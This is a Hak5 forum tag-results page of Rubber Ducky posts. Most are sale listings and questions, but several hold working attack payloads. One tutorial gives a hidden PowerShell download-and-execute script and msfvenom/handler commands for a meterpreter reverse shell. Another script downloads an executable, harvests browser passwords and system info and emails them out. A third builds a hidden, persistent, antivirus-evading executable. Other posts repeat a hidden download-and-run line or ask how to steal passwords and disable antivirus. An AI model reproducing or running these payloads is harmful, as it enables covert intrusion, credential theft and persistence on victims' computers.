Jump to content

Search the Community

Showing results for tags 'Rubber Ducky'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.
  2. I have wifi mark 7 , shark jack , rubber ducky never used ,plunder bug. SOme one make me an offer only had this stuff 3 months. all excellent condition. contact me.
  3. So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)? Here is the Script
  4. I would like to know if it is possible to set up a micro SD card so that I can download programs onto the sd card & have them run automatically when I plug it into any of my devices that are compatible with the programs on the card, without any further input from me, similarly to the USB rubber ducky.
  5. I sell an Ubertooth One, a Throwing Star LAN Tap Pro and a Rubber Ducky. In perfect conditions, material left from a former pentesting lab and never used (Rubber ducky still brand new, in its original sealed plastic bag). All for 160 euros + shipping. I can also send to most countries in Europe via certified mail or UPS/DHL, etc.
  6. Bonjour à tous, je viens de recevoir un canard en caoutchouc et j'aimerai qu'on m'explique étape par étape comment aspirer tous les mots de passe et le fichier d'un ordinateur windows. J'aimerai également savoir commenter paralyser tous les antivirus. Merci
  7. Bonjour a tous , je viens de recevoir ma rubber ducky et j'aimerai qu'on m'explique étape par étape comment aspirer tous les mots de passe et fichier d'un ordinateur windows . J'aimerai également savoir comment paralyser tous les antivirus . Merci
  8. Vaskis


    I am looking for a "hands free" way to change the bios password allot of thin clients. Can the rubber ducky work to do this. Nothing criminal, Just trying to save time and do the process error free. I need to make sure that the keyboard input will work before windows boot. So that it can start the bios enter the password and change it. Can anyone confirm before I spend 50 bucks.
  9. Hazy


    Hi, Would anyone at HAK5 consider working with a UK retailer?
  10. Does anybody know how and if it is possible to open the Bios with the Rubberducky. I tried it with a script that just spams F1 and also with a script that presses F1 every half second. None of those worked. If i go into the bios mannually and then plug in the Rubber Ducky the script executes without a Problem.
  11. Hi I recently buy rubber Ducky and I have some questions: 1- at frist when I connected my rubber ducky to my pc I can able to see as an usb drive, but know I cant see anything,why!? What should I do!? 2- I am an administrator to my own private network and I have a lot of security features like : Anti viruses,DLP,Firewall, GPO , UAC and etc, when I connect the rubber ducky to one my network computer , nothing happened!!! But I heard and read all of PCs as a keyboard or etc, Could please what should I do that When I connect that usb to the pc I can run my code!?Is it possible to do it with Rubber Ducky or bash bunny (I have bash bunny too)!? 3- Can I use rubber ducky for a pc that is in lock or logoff mode and execute my own code!!? 4- I test Rubber Ducky in my MacBook Pro, but when I connect it to it I face a message that said I have a better keyboard and it doesn’t let the code to run, what should I do not to face this message it apple products!? 5- How can change the usb recognition from keyboard to mouse or printer!? Thanks
  12. Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !
  13. Hi Guys I need help creating a payload on the Twin Duck rubber ducky that silently runs tree /a/ /f on the victims computer and then saves the output to the ducky. This is the code that I have so far: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d&echo tree /a /f > echotree.cmd&echotree.cmd > %myd%/results.txt&del echotree.cmd I would like to run it in the Run line. Please help me to optimise it!
  14. Hi everyone, I have a usb Rubber Ducky, in perfect conditions. Last time I used it i was trying to change firmware to a Twin device, and I leave it like 1 year without using it. Yesterday I tried to reset to default firmware but I cant put it on DFU mode, no led ligths turn on, nothing happens when I plugin it. Thanks :'(
  15. What does the root rubber ducky bin file do?
  16. In the HAK5 episode How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky - Hak5 2110 Darren showed a longer way of getting a reverse shell using a longer but a single stage binary of a netcat like tool, but i can't seem to find the original code he used, i kinda want to get a hold of it to see if i can make it run a tiny bit faster but still be a single stage payload. Anyone know where i can get the original(or something close to it) code?
  17. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  18. Hi I realize the all the scripts only work at the second try. Firsttime I plug in the rubber ducky it never works. It looks like this is related to the installation of the stick on the new system. Second plug in it works fine. Do you have the same problem? Is there any solution for this? Thanks for your feedback CR
  19. Recently my sony xa ultra running android 6.0.1's phone battery died and after charging it, my 4 digit pin number had changed. Checking the sony forum, I see this has happened to others. This phone has two lockscreens- one at start up which says "android pin" that I can enter the pin in and it accepts, and the second, which had the same 4 digit pin, that no longer accepts it. Unfortunately, my contacts and text messages never backed up to my external SD card (but thank god my photos and videos did) and Im in the middle of what could be a difficult family legal situation where I desperately need those texts. After searching around the web I came across a few ways I could gain access to the phone without risking losing that data. I saw there is a bluetooth exploit, a possible wifi exploit, a way to deliver malware to my own phone via sms and finally rubber ducky. Never thought I would have to hack into my own phone, but here we are LOL. My skills are limited by way of the first couple of options so the rubber ducky seems like the best bet. However, I am not seeing too much info about the rubber ducky's ability to crack an android 6's pin lock, and judging from a link I posted below that was on this forum, it seems like it could work. That said, I have found a few tutorials on how to use the rubber ducky and code any changes I need, so I just have a few questions and would really appreciate your expertise here, everyone. 1) does the rubber ducky definitely work on android 6? or am I misreading what I find on the forums? 2) is there another way I am not aware of? I dont want to manually enter 10,000 pin combinations, but I am desperate enough that I actually have an excel file with all the possible combinations and have started entering them from 0000....LOL 3) and if the rubber ducky does work on android 6, does anyone know if any of the code can work straight out of the box with the sony xa ultra? I found the github links and tutorial, but I dont want to make any missteps. Thank you for your time. This has been driving my nuts. If anything, ive gotten a crash course over the last 15 hours of googling on how my phone can be protected from hackers LOL LOL
  20. Casetti


    Hello I recently purchased a USB Rubber Ducky and I soon flashed it with twin duck. I then a script on the SD card and plug it in to test the payload. The ducky is just flashing from Green to red countinously. A little help would be great. Thank you, Cassetti
  21. Hello Hackers !!! I am new into infosec practically i was learning before but now into industry work so i am fed up of searching different methodology, tools, frameworks. I am stucked with something real life scenarios, there is wifi router which have 10 users. Me as admin of that router, how can i access these 10 users (PC, Andriod, etc) ? I tried wireshark, and many other stuff didnt get anything suitable? can i do this via adding a default welcome page to my router if some one connect will have to download something or something like this? a Newbie need help ;D
  22. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  23. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  24. Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  25. Hi guys, I've been playing around trying to create a Bluetooth version of Rubber Ducky working. Not sure how useful that would be, but I'm in the very early stages. Have been experimenting with this beauty: BBC micro:bit Most 11/12 year olds in the UK will have received one of these in school last year. The BBC ran a programme that allowed schools to apply for free micro:bits for all of Year 7 (6th grade). There's a friendly online interface to program them in Python, but you can actually compile C++ for these badboys. They're available for under £15 / $18: http://microbit.org/resellers/, hence making good little gadgets to mess around with for a BT Rubber Ducky. The micro:bit has a few pins available, a USB port, a small bluetooth antenna, it's very small and can be battery powered (or USB powered). On the front there are 15 LED lights and two buttons to play with: You can program the micro:bit to connect via Bluetooth, with little security (no PIN or anything). Then you can use the two buttons to send commands to the computer or smartphone. At the moment, I'm only able to send ASCII commands, so I've been mapping out the special commands in an ASCII/latin table. I haven't yet figured out how to use the Windows key, but I have managed to take a screenshot ("\x8C") and save a file with the name pwned ("\x99,s,pwned,\n"). Sample file available here, just drag and drop it onto your micro:bit, connect to 'ducky' via BT, the left button will take screenshots, the right button will save files. Code is available here, hopefully others will be able to assist with this experiment :).
  • Create New...